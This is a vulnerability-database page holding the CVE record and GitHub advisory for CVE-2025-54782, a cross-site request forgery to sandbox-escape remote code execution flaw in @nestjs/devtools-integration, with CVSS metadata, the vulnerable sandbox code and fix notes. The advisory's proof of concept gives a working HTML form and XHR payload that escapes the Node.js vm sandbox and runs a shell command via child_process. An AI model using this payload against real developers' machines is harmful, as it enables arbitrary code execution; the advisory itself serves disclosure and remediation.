cvelistv5 - CVE-2025-54782

CVE-2025-54782 (GCVE-0-2025-54782)

Vulnerability from cvelistv5 – Published: 2025-08-01 23:36 – Updated: 2025-08-04 15:23

Title

@nestjs/devtools-integration's CSRF to Sandbox Escape Allows for RCE against JS Developers

Summary

Nest is a framework for building scalable Node.js server-side applications. In versions 0.2.0 and below, a critical Remote Code Execution (RCE) vulnerability was discovered in the @nestjs/devtools-integration package. When enabled, the package exposes a local development HTTP server with an API endpoint that uses an unsafe JavaScript sandbox (safe-eval-like implementation). Due to improper sandboxing and missing cross-origin protections, any malicious website visited by a developer can execute arbitrary code on their local machine. The package adds HTTP endpoints to a locally running NestJS development server. One of these endpoints, /inspector/graph/interact, accepts JSON input containing a code field and executes the provided code in a Node.js vm.runInNewContext sandbox. This is fixed in version 0.2.1.

Severity ?

9.4 (Critical)


                        
                          CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

CWE

CWE-77 - Improper Neutralization of Special Elements used in a Command ('Command Injection')
CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CWE-352 - Cross-Site Request Forgery (CSRF)

Assigner

GitHub_M

References

URL

Tags

	https://github.com/nestjs/nest/security/advisorie…	x_refsource_CONFIRM
	https://github.com/JLLeitschuh/nestjs-devtools-in…	x_refsource_MISC
	https://github.com/JLLeitschuh/nestjs-typescript-…	x_refsource_MISC
	https://nodejs.org/api/vm.html	x_refsource_MISC
	https://socket.dev/blog/nestjs-rce-vuln	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	nestjs	nest	Affected: < 0.2.1

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-54782",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-08-04T15:23:27.339034Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-08-04T15:23:30.116Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/nestjs/nest/security/advisories/GHSA-85cg-cmq5-qjm7"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "nest",
          "vendor": "nestjs",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 0.2.1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Nest is a framework for building scalable Node.js server-side applications. In versions 0.2.0 and below, a critical Remote Code Execution (RCE) vulnerability was discovered in the @nestjs/devtools-integration package. When enabled, the package exposes a local development HTTP server with an API endpoint that uses an unsafe JavaScript sandbox (safe-eval-like implementation). Due to improper sandboxing and missing cross-origin protections, any malicious website visited by a developer can execute arbitrary code on their local machine. The package adds HTTP endpoints to a locally running NestJS development server. One of these endpoints, /inspector/graph/interact, accepts JSON input containing a code field and executes the provided code in a Node.js vm.runInNewContext sandbox. This is fixed in version 0.2.1."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "ADJACENT",
            "baseScore": 9.4,
            "baseSeverity": "CRITICAL",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "HIGH",
            "subConfidentialityImpact": "HIGH",
            "subIntegrityImpact": "HIGH",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
            "version": "4.0",
            "vulnAvailabilityImpact": "HIGH",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "HIGH"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-77",
              "description": "CWE-77: Improper Neutralization of Special Elements used in a Command (\u0027Command Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-78",
              "description": "CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-352",
              "description": "CWE-352: Cross-Site Request Forgery (CSRF)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-08-01T23:36:58.421Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/nestjs/nest/security/advisories/GHSA-85cg-cmq5-qjm7",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/nestjs/nest/security/advisories/GHSA-85cg-cmq5-qjm7"
        },
        {
          "name": "https://github.com/JLLeitschuh/nestjs-devtools-integration-rce-poc",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/JLLeitschuh/nestjs-devtools-integration-rce-poc"
        },
        {
          "name": "https://github.com/JLLeitschuh/nestjs-typescript-starter-w-devtools-integration",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/JLLeitschuh/nestjs-typescript-starter-w-devtools-integration"
        },
        {
          "name": "https://nodejs.org/api/vm.html",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://nodejs.org/api/vm.html"
        },
        {
          "name": "https://socket.dev/blog/nestjs-rce-vuln",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://socket.dev/blog/nestjs-rce-vuln"
        }
      ],
      "source": {
        "advisory": "GHSA-85cg-cmq5-qjm7",
        "discovery": "UNKNOWN"
      },
      "title": "@nestjs/devtools-integration\u0027s CSRF to Sandbox Escape Allows for RCE against JS Developers"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-54782",
    "datePublished": "2025-08-01T23:36:58.421Z",
    "dateReserved": "2025-07-29T16:50:28.391Z",
    "dateUpdated": "2025-08-04T15:23:30.116Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-54782\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-08-02T00:15:25.953\",\"lastModified\":\"2025-10-09T17:31:16.827\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Nest is a framework for building scalable Node.js server-side applications. In versions 0.2.0 and below, a critical Remote Code Execution (RCE) vulnerability was discovered in the @nestjs/devtools-integration package. When enabled, the package exposes a local development HTTP server with an API endpoint that uses an unsafe JavaScript sandbox (safe-eval-like implementation). Due to improper sandboxing and missing cross-origin protections, any malicious website visited by a developer can execute arbitrary code on their local machine. The package adds HTTP endpoints to a locally running NestJS development server. One of these endpoints, /inspector/graph/interact, accepts JSON input containing a code field and executes the provided code in a Node.js vm.runInNewContext sandbox. This is fixed in version 0.2.1.\"},{\"lang\":\"es\",\"value\":\"Nest es un framework para crear aplicaciones escalables del lado del servidor en Node.js. En las versiones 0.2.0 y anteriores, se descubri\u00f3 una vulnerabilidad cr\u00edtica de Ejecuci\u00f3n Remota de C\u00f3digo (RCE) en el paquete @nestjs/devtools-integration. Al habilitarse, el paquete expone un servidor HTTP de desarrollo local con un endpoint de API que utiliza un entorno de pruebas de JavaScript inseguro (implementaci\u00f3n similar a la de evaluaci\u00f3n segura). Debido a un entorno de pruebas inadecuado y a la falta de protecciones entre or\u00edgenes, cualquier sitio web malicioso visitado por un desarrollador puede ejecutar c\u00f3digo arbitrario en su equipo local. El paquete a\u00f1ade endpoints HTTP a un servidor de desarrollo NestJS que se ejecuta localmente. Uno de estos endpoints, /inspector/graph/interact, acepta una entrada JSON que contiene un campo de c\u00f3digo y ejecuta el c\u00f3digo proporcionado en un entorno de pruebas vm.runInNewContext de Node.js. Esto se solucion\u00f3 en la versi\u00f3n 0.2.1.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":9.4,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"ADJACENT\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"HIGH\",\"vulnIntegrityImpact\":\"HIGH\",\"vulnAvailabilityImpact\":\"HIGH\",\"subConfidentialityImpact\":\"HIGH\",\"subIntegrityImpact\":\"HIGH\",\"subAvailabilityImpact\":\"HIGH\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\",\"baseScore\":8.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-77\"},{\"lang\":\"en\",\"value\":\"CWE-78\"},{\"lang\":\"en\",\"value\":\"CWE-352\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nestjs:devtools-integration:*:*:*:*:*:node.js:*:*\",\"versionEndExcluding\":\"0.2.1\",\"matchCriteriaId\":\"3CB5DF69-E7C3-4DBF-920E-E4418A346FEF\"}]}]}],\"references\":[{\"url\":\"https://github.com/JLLeitschuh/nestjs-devtools-integration-rce-poc\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\"]},{\"url\":\"https://github.com/JLLeitschuh/nestjs-typescript-starter-w-devtools-integration\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\"]},{\"url\":\"https://github.com/nestjs/nest/security/advisories/GHSA-85cg-cmq5-qjm7\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://nodejs.org/api/vm.html\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\"]},{\"url\":\"https://socket.dev/blog/nestjs-rce-vuln\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/nestjs/nest/security/advisories/GHSA-85cg-cmq5-qjm7\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-54782\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-08-04T15:23:27.339034Z\"}}}], \"references\": [{\"url\": \"https://github.com/nestjs/nest/security/advisories/GHSA-85cg-cmq5-qjm7\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-08-04T15:23:18.309Z\"}}], \"cna\": {\"title\": \"@nestjs/devtools-integration\u0027s CSRF to Sandbox Escape Allows for RCE against JS Developers\", \"source\": {\"advisory\": \"GHSA-85cg-cmq5-qjm7\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 9.4, \"attackVector\": \"ADJACENT\", \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"HIGH\", \"vulnIntegrityImpact\": \"HIGH\", \"subAvailabilityImpact\": \"HIGH\", \"vulnAvailabilityImpact\": \"HIGH\", \"subConfidentialityImpact\": \"HIGH\", \"vulnConfidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"nestjs\", \"product\": \"nest\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 0.2.1\"}]}], \"references\": [{\"url\": \"https://github.com/nestjs/nest/security/advisories/GHSA-85cg-cmq5-qjm7\", \"name\": \"https://github.com/nestjs/nest/security/advisories/GHSA-85cg-cmq5-qjm7\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/JLLeitschuh/nestjs-devtools-integration-rce-poc\", \"name\": \"https://github.com/JLLeitschuh/nestjs-devtools-integration-rce-poc\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/JLLeitschuh/nestjs-typescript-starter-w-devtools-integration\", \"name\": \"https://github.com/JLLeitschuh/nestjs-typescript-starter-w-devtools-integration\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://nodejs.org/api/vm.html\", \"name\": \"https://nodejs.org/api/vm.html\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://socket.dev/blog/nestjs-rce-vuln\", \"name\": \"https://socket.dev/blog/nestjs-rce-vuln\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Nest is a framework for building scalable Node.js server-side applications. In versions 0.2.0 and below, a critical Remote Code Execution (RCE) vulnerability was discovered in the @nestjs/devtools-integration package. When enabled, the package exposes a local development HTTP server with an API endpoint that uses an unsafe JavaScript sandbox (safe-eval-like implementation). Due to improper sandboxing and missing cross-origin protections, any malicious website visited by a developer can execute arbitrary code on their local machine. The package adds HTTP endpoints to a locally running NestJS development server. One of these endpoints, /inspector/graph/interact, accepts JSON input containing a code field and executes the provided code in a Node.js vm.runInNewContext sandbox. This is fixed in version 0.2.1.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-77\", \"description\": \"CWE-77: Improper Neutralization of Special Elements used in a Command (\u0027Command Injection\u0027)\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-78\", \"description\": \"CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-352\", \"description\": \"CWE-352: Cross-Site Request Forgery (CSRF)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-08-01T23:36:58.421Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-54782\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-08-04T15:23:30.116Z\", \"dateReserved\": \"2025-07-29T16:50:28.391Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-08-01T23:36:58.421Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

GHSA-85CG-CMQ5-QJM7

Vulnerability from github – Published: 2025-08-01 18:43 – Updated: 2025-08-04 15:28

Summary

@nestjs/devtools-integration: CSRF to Sandbox Escape Allows for RCE against JS Developers

Details

Summary

A critical Remote Code Execution (RCE) vulnerability was discovered in the @nestjs/devtools-integration package. When enabled, the package exposes a local development HTTP server with an API endpoint that uses an unsafe JavaScript sandbox (safe-eval-like implementation). Due to improper sandboxing and missing cross-origin protections, any malicious website visited by a developer can execute arbitrary code on their local machine.

A full blog post about how this vulnerability was uncovered can be found on Socket's blog.

Details

The @nestjs/devtools-integration package adds HTTP endpoints to a locally running NestJS development server. One of these endpoints, /inspector/graph/interact, accepts JSON input containing a code field and executes the provided code in a Node.js vm.runInNewContext sandbox.

Key issues: 1. Unsafe Sandbox: The sandbox implementation closely resembles the abandoned safe-eval library. The Node.js vm module is explicitly documented as not providing a security mechanism for executing untrusted code. Numerous known sandbox escape techniques allow arbitrary code execution. 2. Lack of Proper CORS/Origin Checking: The server sets Access-Control-Allow-Origin to a fixed domain (https://devtools.nestjs.com) but does not validate the request's Origin or Content-Type. Attackers can craft POST requests with text/plain content type using HTML forms or simple XHR requests, bypassing CORS preflight checks.

By chaining these issues, a malicious website can trigger the vulnerable endpoint and achieve arbitrary code execution on a developer's machine running the NestJS devtools integration.

Relevant code from the package:

// Vulnerable request handler
handleGraphInteraction(req, res) {
  if (req.method === 'POST') {
    let body = '';
    req.on('data', data => { body += data; });
    req.on('end', async () => {
      res.writeHead(200, { 'Content-Type': 'application/plain' });
      const json = JSON.parse(body);
      await this.sandboxedCodeExecutor.execute(json.code, res);
    });
  }
}

// Vulnerable sandbox implementation
runInNewContext(code, context, opts) {
  const sandbox = {};
  const resultKey = 'SAFE_EVAL_' + Math.floor(Math.random() * 1000000);
  sandbox[resultKey] = {};
  const ctx = `
    (function() {
      Function = undefined;
      const keys = Object.getOwnPropertyNames(this).concat(['constructor']);
      keys.forEach((key) => {
        const item = this[key];
        if (!item || typeof item.constructor !== 'function') return;
        this[key].constructor = undefined;
      });
    })();
  `;
  code = ctx + resultKey + '=' + code;
  if (context) {
    Object.keys(context).forEach(key => { sandbox[key] = context[key]; });
  }
  vm.runInNewContext(code, sandbox, opts);
  return sandbox[resultKey];
}

Because the sandbox can be trivially escaped, and the endpoint accepts cross-origin POST requests without proper checks, this vulnerability allows arbitrary code execution on the developer's machine.

PoC

Create a minimal NestJS project and enable @nestjs/devtools-integration in development mode:

npm install @nestjs/devtools-integration
npm run start:dev

Use the following HTML form on any malicious website:

<form action="http://localhost:8000/inspector/graph/interact" method="POST" enctype="text/plain">
  <input name="{&quot;code&quot;:&quot;(function(){try{propertyIsEnumerable.call()}catch(pp){pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('open /System/Applications/Calculator.app')}})()&quot;,&quot;bogus&quot;:&quot;" value="&quot;}" />
  <input type="submit" value="Exploit" />
</form>

When the developer visits the page and submits the form, the local NestJS devtools server executes the injected code, in this case launching the Calculator app on macOS.

Alternatively, the same payload can be sent via a simple XHR request with text/plain content type:

<button onclick="sendPopCalculatorXHR()">Send pop calculator XHR Request</button>
<script>
    function sendPopCalculatorXHR() {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://localhost:8000/inspector/graph/interact");
        xhr.withCredentials = false;
        xhr.setRequestHeader("Content-Type", "text/plain");
        xhr.send('{"code":"(function() { try{ propertyIsEnumerable.call(); } catch(pp){ pp.constructor.constructor(\'return process\')().mainModule.require(\'child_process\').execSync(\'open /System/Applications/Calculator.app\'); } })()"}');
    }
</script>

Full POC

Minimal reproducer: https://github.com/JLLeitschuh/nestjs-typescript-starter-w-devtools-integration

Steps to reproduce:

Clone Repo https://github.com/JLLeitschuh/nestjs-typescript-starter-w-devtools-integration
Run NPM install
Run npm run start:dev
Open up the POC site here: https://jlleitschuh.org/nestjs-devtools-integration-rce-poc/
Try out any of the POC payloads.

Source for the nestjs-devtools-integration-rce-poc: https://github.com/JLLeitschuh/nestjs-devtools-integration-rce-poc

Impact

This vulnerability is a Remote Code Execution (RCE) affecting developers running a NestJS project with @nestjs/devtools-integration enabled. An attacker can exploit it by luring a developer to visit a malicious website, which then sends a crafted POST request to the local devtools HTTP server. This results in arbitrary code execution on the developer’s machine.

Severity: Critical
Attack Complexity: Low (requires only that the victim visits a malicious webpage, or be served malvertising)
Privileges Required: None
User Interaction: Minimal (no clicks required)

Fix

The maintainers remediated this issue by:

Replacing the unsafe sandbox implementation with a safer alternative (@nyariv/sandboxjs).
Adding origin and content-type validation to incoming requests.
Introducing authentication for the devtools connection.

Users should upgrade to the patched version of @nestjs/devtools-integration as soon as possible.

Credit

This vulnerability was uncovered by @JLLeitschuh on behalf of Socket.

Severity ?

9.4 (Critical)


                  
                    CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.2.0"
      },
      "package": {
        "ecosystem": "npm",
        "name": "@nestjs/devtools-integration"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.2.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-54782"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-352",
      "CWE-77",
      "CWE-78"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-08-01T18:43:13Z",
    "nvd_published_at": "2025-08-02T00:15:25Z",
    "severity": "CRITICAL"
  },
  "details": "## Summary\nA critical Remote Code Execution (RCE) vulnerability was discovered in the `@nestjs/devtools-integration` package. When enabled, the package exposes a local development HTTP server with an API endpoint that uses an unsafe JavaScript sandbox (`safe-eval`-like implementation). Due to improper sandboxing and missing cross-origin protections, any malicious website visited by a developer can execute arbitrary code on their local machine.\n\nA full blog post about how this vulnerability was uncovered can be found on [Socket\u0027s blog](https://socket.dev/blog/nestjs-rce-vuln).\n\n## Details\nThe `@nestjs/devtools-integration` package adds HTTP endpoints to a locally running NestJS development server. One of these endpoints, `/inspector/graph/interact`, accepts JSON input containing a `code` field and executes the provided code in a Node.js `vm.runInNewContext` sandbox.\n\nKey issues:\n1. **Unsafe Sandbox:** The sandbox implementation closely resembles the abandoned `safe-eval` library. The Node.js `vm` module is [explicitly documented](https://nodejs.org/api/vm.html) as not providing a security mechanism for executing untrusted code. Numerous known sandbox escape techniques allow arbitrary code execution.\n2. **Lack of Proper CORS/Origin Checking:** The server sets `Access-Control-Allow-Origin` to a fixed domain (`https://devtools.nestjs.com`) but does not validate the request\u0027s `Origin` or `Content-Type`. Attackers can craft POST requests with `text/plain` content type using HTML forms or simple XHR requests, bypassing CORS preflight checks.\n\nBy chaining these issues, a malicious website can trigger the vulnerable endpoint and achieve arbitrary code execution on a developer\u0027s machine running the NestJS devtools integration.\n\nRelevant code from the package:\n\n```js\n// Vulnerable request handler\nhandleGraphInteraction(req, res) {\n  if (req.method === \u0027POST\u0027) {\n    let body = \u0027\u0027;\n    req.on(\u0027data\u0027, data =\u003e { body += data; });\n    req.on(\u0027end\u0027, async () =\u003e {\n      res.writeHead(200, { \u0027Content-Type\u0027: \u0027application/plain\u0027 });\n      const json = JSON.parse(body);\n      await this.sandboxedCodeExecutor.execute(json.code, res);\n    });\n  }\n}\n\n// Vulnerable sandbox implementation\nrunInNewContext(code, context, opts) {\n  const sandbox = {};\n  const resultKey = \u0027SAFE_EVAL_\u0027 + Math.floor(Math.random() * 1000000);\n  sandbox[resultKey] = {};\n  const ctx = `\n    (function() {\n      Function = undefined;\n      const keys = Object.getOwnPropertyNames(this).concat([\u0027constructor\u0027]);\n      keys.forEach((key) =\u003e {\n        const item = this[key];\n        if (!item || typeof item.constructor !== \u0027function\u0027) return;\n        this[key].constructor = undefined;\n      });\n    })();\n  `;\n  code = ctx + resultKey + \u0027=\u0027 + code;\n  if (context) {\n    Object.keys(context).forEach(key =\u003e { sandbox[key] = context[key]; });\n  }\n  vm.runInNewContext(code, sandbox, opts);\n  return sandbox[resultKey];\n}\n```\n\nBecause the sandbox can be trivially escaped, and the endpoint accepts cross-origin POST requests without proper checks, this vulnerability allows arbitrary code execution on the developer\u0027s machine.\n\n## PoC\nCreate a minimal NestJS project and enable @nestjs/devtools-integration in development mode:\n\n```\nnpm install @nestjs/devtools-integration\nnpm run start:dev\n```\n\nUse the following HTML form on any malicious website:\n\n\n```html\n\u003cform action=\"http://localhost:8000/inspector/graph/interact\" method=\"POST\" enctype=\"text/plain\"\u003e\n  \u003cinput name=\"{\u0026quot;code\u0026quot;:\u0026quot;(function(){try{propertyIsEnumerable.call()}catch(pp){pp.constructor.constructor(\u0027return process\u0027)().mainModule.require(\u0027child_process\u0027).execSync(\u0027open /System/Applications/Calculator.app\u0027)}})()\u0026quot;,\u0026quot;bogus\u0026quot;:\u0026quot;\" value=\"\u0026quot;}\" /\u003e\n  \u003cinput type=\"submit\" value=\"Exploit\" /\u003e\n\u003c/form\u003e\n```\n\nWhen the developer visits the page and submits the form, the local NestJS devtools server executes the injected code, in this case launching the Calculator app on macOS.\n\nAlternatively, the same payload can be sent via a simple XHR request with text/plain content type:\n\n```html\n\u003cbutton onclick=\"sendPopCalculatorXHR()\"\u003eSend pop calculator XHR Request\u003c/button\u003e\n\u003cscript\u003e\n    function sendPopCalculatorXHR() {\n        var xhr = new XMLHttpRequest();\n        xhr.open(\"POST\", \"http://localhost:8000/inspector/graph/interact\");\n        xhr.withCredentials = false;\n        xhr.setRequestHeader(\"Content-Type\", \"text/plain\");\n        xhr.send(\u0027{\"code\":\"(function() { try{ propertyIsEnumerable.call(); } catch(pp){ pp.constructor.constructor(\\\u0027return process\\\u0027)().mainModule.require(\\\u0027child_process\\\u0027).execSync(\\\u0027open /System/Applications/Calculator.app\\\u0027); } })()\"}\u0027);\n    }\n\u003c/script\u003e\n```\n\n### Full POC\n\nMinimal reproducer: https://github.com/JLLeitschuh/nestjs-typescript-starter-w-devtools-integration\n\nSteps to reproduce:\n\n1. Clone Repo https://github.com/JLLeitschuh/nestjs-typescript-starter-w-devtools-integration\n2. Run NPM install\n3. Run `npm run start:dev`\n4. Open up the POC site here: https://jlleitschuh.org/nestjs-devtools-integration-rce-poc/\n5. Try out any of the POC payloads.\n\nSource for the `nestjs-devtools-integration-rce-poc`: https://github.com/JLLeitschuh/nestjs-devtools-integration-rce-poc\n\n## Impact\n\nThis vulnerability is a Remote Code Execution (RCE) affecting developers running a NestJS project with `@nestjs/devtools-integration` enabled. An attacker can exploit it by luring a developer to visit a malicious website, which then sends a crafted POST request to the local devtools HTTP server. This results in arbitrary code execution on the developer\u2019s machine.\n\n- Severity: Critical\n- Attack Complexity: Low (requires only that the victim visits a malicious webpage, or be served malvertising)\n- Privileges Required: None\n- User Interaction: Minimal (no clicks required)\n\n## Fix\nThe maintainers remediated this issue by:\n\n - Replacing the unsafe sandbox implementation with a safer alternative (@nyariv/sandboxjs).\n - Adding origin and content-type validation to incoming requests.\n - Introducing authentication for the devtools connection.\n\nUsers should upgrade to the patched version of @nestjs/devtools-integration as soon as possible.\n\n## Credit\n\nThis vulnerability was uncovered by @JLLeitschuh on behalf of [Socket](https://socket.dev/).",
  "id": "GHSA-85cg-cmq5-qjm7",
  "modified": "2025-08-04T15:28:48Z",
  "published": "2025-08-01T18:43:13Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nestjs/nest/security/advisories/GHSA-85cg-cmq5-qjm7"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54782"
    },
    {
      "type": "WEB",
      "url": "https://github.com/JLLeitschuh/nestjs-devtools-integration-rce-poc"
    },
    {
      "type": "WEB",
      "url": "https://github.com/JLLeitschuh/nestjs-typescript-starter-w-devtools-integration"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nestjs/nest"
    },
    {
      "type": "WEB",
      "url": "https://jlleitschuh.org/nestjs-devtools-integration-rce-poc"
    },
    {
      "type": "WEB",
      "url": "https://nodejs.org/api/vm.html"
    },
    {
      "type": "WEB",
